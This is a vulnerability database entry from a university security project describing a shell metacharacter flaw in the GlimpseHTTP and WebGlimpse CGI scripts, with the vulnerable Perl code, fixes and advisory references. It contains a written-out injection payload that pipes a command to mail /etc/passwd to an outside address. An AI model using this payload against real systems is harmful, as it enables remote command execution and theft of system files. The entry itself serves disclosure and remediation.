AGlimpse meta-characters

DOVES Vulnerability V-00100

DOVES Project
Computer Security Laboratory
Department of Computer Science
University of California at Davis

Description

Brief summary: The GlimpseHTTP package does not check its input adequately, allowing users to insert metacharacters to force remote execution of a command.

Detailed description: GlimpseHTTP and WebGlimpse are popular collections of tools that provide easy-to-use interface to glimpse, an indexing and query system, to provide a search facility on web sites. Neither GlimpseHTTP nor WebGlimpse check inputs for shell meta-characters.

The relevant code is as follows:

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
        $length = $1;
        $path = $2;
        $path =~ s|"||g;  } else {
        &err_badargs;  }

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

Note that this splits PATH_INFO in two fields, $length and $path, and then takes the first $length characters from $path and puts them in $indexdir. The last line opens "$indexdir/archive.cfg".

By setting $indexdir to a string that begins with '|', the system will execute whatever it finds after the pipe, giving it as STDIN what you write to the CONF handle. If $indexdir is set to something like|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo it will execute the command in CMD using IFS as separator. The one above sends the remote user the "/etc/passwd" from the host on which the web server is running.. (The last echo(1) is used to ignore the rest of the string.)

Components: GlimpseHTTP, WebGlimpse, aglimpse, cgi-bin, web server

Operating system(s): not knownIntruders can execute arbitrary commands with the privileges of the web server process.

How to detect: Check for the above code in WebGlimpse or GlimpseHTTP.

How to fix:

You need to get rid of the offending programs.
1. Disable GlimpseHTTP and WebGlimpse.
2. Upgrade to WebGlimpse version 1.5 or later. GlimpseHTTP is no longer supported.

Other information: none

Keywords

metacharacter, www, glimpse, web server

Cataloguing Information

Common Vulnerability Exposure: The aglimpse CGI program of the Glimpse package allows remote execution of arbitrary commands [CVE-1999-0147]

Exploits

Attacks: See DOVES exploit #100.

Related Information

CERT Advisory CA-97.25.CGI_metachar, Sanitizing User-Supplied Data in CGI Scripts has general advice on sanitizing user input for CGI scripts that is relevant. The Project FUSE web site has a page about GlimpseHTTP security.

Advisories:

ISS X-Force database entry http-cgi-glimpse
CERT Vendor-initiated bulletin VB-97.13, Vulnerability in GlimpseHTTP and WebGlimpse CGI scripts from Project FUSE

Related DOVES entries:

History

Who reported it: Razvan Dragomirescu in Bugtraq on Wed Jul 02 1997 19:32:09

Revision #1

Stacey Anderson on 6/26/2000
Initial entry

Send email to doves@cs.ucdavis.edu

Department of Computer Science
University of California at Davis
One Shields Ave.
Davis, CA 95616-8562

Page created August 28, 2000 at 16:41:44 GMT